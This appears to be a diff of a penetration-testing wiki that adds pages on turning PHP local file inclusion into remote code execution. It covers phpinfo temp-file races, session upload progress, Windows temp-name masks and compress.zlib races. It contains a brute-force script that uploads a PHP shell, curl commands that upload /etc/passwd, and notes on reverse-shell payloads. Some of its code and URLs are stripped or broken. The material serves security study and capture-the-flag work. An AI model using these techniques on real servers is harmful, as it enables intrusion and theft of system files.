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5 changed files with 153 additions and 53 deletions

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@ -406,8 +406,11 @@
* [Email Injections](pentesting-web/
* [File Inclusion/Path traversal](pentesting-web/file-inclusion/
* [phar:// deserialization](pentesting-web/file-inclusion/
* [LFI2RCE via phpinfo()](pentesting-web/file-inclusion/
* [LFI2RCE via Nginx temp files](pentesting-web/file-inclusion/
* [Via PHP\_SESSION\_UPLOAD\_PROGRESS](pentesting-web/file-inclusion/via-php\_session\_upload\
* [LFI2RCE via phpinfo()](pentesting-web/file-inclusion/
* [LFI2RCE Via temp file uploads](pentesting-web/file-inclusion/
* [LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure](pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php\_stream\_prefer\
* [File Upload](pentesting-web/file-upload/
* [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/
* [Formula Injection](pentesting-web/

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@ -3,14 +3,13 @@
{% hint style="warning" %}
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@ -413,61 +412,45 @@ If ssh is active check which user is being used (/proc/self/status & /etc/passwd
The logs of this FTP server are stored in _**/var/log/vsftpd.log.**_ If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI.
### Via Nginx temp file storage
If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique:
{% content-ref url="" %}
{% endcontent-ref %}
If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**. You could abuse this to get RCE:
{% content-ref url="" %}
{% endcontent-ref %}
### Via temp file uploads in Windows
If you found a **Local File Inclusion** and and the server is running in **Windows** you might get RCE:
{% content-ref url="" %}
{% endcontent-ref %}
### Via phpinfo() (file\_uploads = on)
To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo() is displayed, "file\_uploads = on" and the server has to be able to write in the "/tmp" directory.**
If you found a **Local File Inclusion** and a file exposing **phpinfo()** with file\_uploads = on you can get RCE:
{% content-ref url="" %}
{% endcontent-ref %}
**Tutorial HTB**: [\&t=600s](\&t=600s)
### Via compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure
You need to fix the exploit (change **=>** for **=>**). To do so you can do:
If you found a **Local File Inclusion** and you **can exfiltrate the path** of the temp file BUT the **server** is **checking** if the **file to be included has PHP marks**, you can try to **bypass that check** with this **Race Condition**:
sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g'
You have to change also the **payload** at the beginning of the exploit (for a php-rev-shell for example), the **REQ1** (this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), and **LFIREQ** (this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char)
{% file src="../../.gitbook/assets/LFI-With-PHPInfo-Assistance.pdf" %}
#### Theory
If uploads are allowed in PHP and you try to upload a file, this files is stored in a temporal directory until the server has finished processing the request, then this temporary files is deleted.
Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted.
In **Windows** the files are usually stored in **C:\Windows\temp\php<<**
In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig()**".
**PHP** uses a buffer of **4096B** and when it is **full**, it is **send to the client**. Then the client can **send** **a lot of big requests** (using big headers) **uploading a php** reverse **shell**, wait for the **first part of the phpinfo() to be returned** (where the name of the temporary file is) and try to **access the temp file** before the php server deletes the file exploiting a LFI vulnerability.
**Python script to try to bruteforce the name (if length = 6)**
import itertools
import requests
import sys
print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):'', f)
print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = '' + fname
r = requests.get(url)
if 'load average' in r.text: # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
print('[x] Something went wrong, please try again')
{% content-ref url="" %}
{% endcontent-ref %}
### References

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@ -0,0 +1,39 @@
# LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure
### `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
A file opened using the protocol `compress.zlib://` with the flag `PHP_STREAM_PREFER_STDIO` can continue writing data that arrives to the connection later to the same file.
This means that a call such as:
Will send a request asking for, then the server might respond the request with a valid HTTP response, keep the connection open, and send extra data some time later that will be also written into the file.
You can see that info in this part of the php-src code in main/streams/cast.c:
/* Use a tmpfile and copy the old streams contents into it */
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
### Race Condition to RCE
****[**This CTF**](\_writeup/20191228-hxp36c3ctf/#includer) was solved using the previous trick.
The attacker will make the **victim server open a connection reading a file from the attackers server** using the **`compress.zlib`** protocol.
**While** this **connection** exist the attacker will **exfiltrate the path** to the temp file created (it's leaked by the server).
**While** the **connection** is still open, the attacker will **exploit a LFI loading the temp file** that he controls.
However, there is a check in the web server that **prevents loading files that contains `<?`**. Therefore, the attacker will abuse a **Race Condition**. In the connection that is still open the **attacker** will **send the PHP payload AFTER** the **webserver** has **checked** if the file contains the forbidden characters but **BEFORE it loads its content**.
For more information check the description of the Race Condition and the CTF in [\_writeup/20191228-hxp36c3ctf/#includer](\_writeup/20191228-hxp36c3ctf/#includer)

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@ -0,0 +1,39 @@
# LFI2RCE Via temp file uploads
### **PHP File uploads**
**PHP** engine, upon **receiving a POST packet** with RFC 1867 **coded file(s)**, **creates** one or more **temporary files** which are used to **store the uploaded files data**. A PHP script handling file uploads is required to use the move\_uploaded\_file function to move the uploaded temporary file to a place of it's desire (if the script requires the file to exists after it terminates that is). **When the script ends PHP engine removes all temporary files** for files that were uploaded (if any are left after the script ends that is).
{% hint style="info" %}
**As the attacker will usually know where this temporary files are located, in case he found a Local File Inclusion, he might find to load the file being uploaded and get RCE.**
{% endhint %}
The main problem to access the file basically to **guess its name (which will be "random")**.
### Windows Exploitation
To generate the r**andom name on Windows,** PHP uses the **`GetTempFileName`** function. Looking into documentation we can find the following explanation: The GetTempFileName function creates a temporary file name of the following form:
* The path is `upload_tmp_dir` which normally it's `C:\Windows\Temp`
* The pre is usually: "php"
* The \<uuuu> is a unique hex value. However:
* Only the lower 16 bits of the uUnique parameter are used. This limits GetTempFileName to a maximum of 65,535 unique file names if the lpPathName and lpPrefixStringparameters remain the same. **It's possible to brute-force it.**
As we saw, it's fairly **easy** to **find** the **temporary file in Windows systems**. And it's going to get easier because brute force is not needed here, thanks to a certain FindFirstFile quirk which allows **using masks** (<< as \* and > as ?) in LFI paths on Windows. Thanks to this, one can form an **include path like this**:
(In some cases more specific mask might be necessary such as `php1<<` or `phpA<<`). You can Brute-Force more specific masks until you find your uploaded temporary file.
### GNU/Linux Exploitation
The random value of the file name is good enough to not be neither predictable nor brute-forceable. For more info, check the references.
### References
* [](
* [\_LFI\_rfc1867\_temporary\_files.pdf](\_LFI\_rfc1867\_temporary\_files.pdf)

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@ -0,0 +1,36 @@
### Basic Info
If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**.
$ curl -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
. ..
$ curl -H 'Cookie: PHPSESSID=iamorange' -d 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'
$ ls -a /var/lib/php/sessions/
. ..
$ curl -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah' -F 'file=@/etc/passwd'
$ ls -a /var/lib/php/sessions/
. .. sess_iamorange
In the last example the session will contain the string blahblahblah
Note that with **`PHP_SESSION_UPLOAD_PROGRESS`** you can **control data inside the session**, so if you includes your session file you can include a part you control (a php shellcode for example).
{% hint style="info" %}
Although most tutorials on the Internet recommends you to set `session.upload_progress.cleanup` to `Off` for debugging purpose. The default `session.upload_progress.cleanup` in PHP is still `On`. It means your upload progress in the session will be cleaned as soon as possible. So this will be **Race Condition**.
{% endhint %}
### The CTF
In the [**original CTF**]( where this technique is commented, it wasn't enough to exploit the Race Condition but the content loaded needed to start also with the string `@<?php`.
Due to the default setting of `session.upload_progress.prefix`, our **SESSION file will start with a annoying prefix** `upload_progress_` Such as: `upload_progress_controlledcontentbyattacker`
The trick to **remove the initial prefix** was to **base64encode the payload 3 times** and then decode it via `convert.base64-decode` filters, this is because when **base64 decoding PHP will remove the weird characters**, so after 3 times **only** the **payload** **sent** by the attacker will **remain** (and then the attacker can control the initial part).
More information in the original writeup []( and final exploit [\_for\](\_for\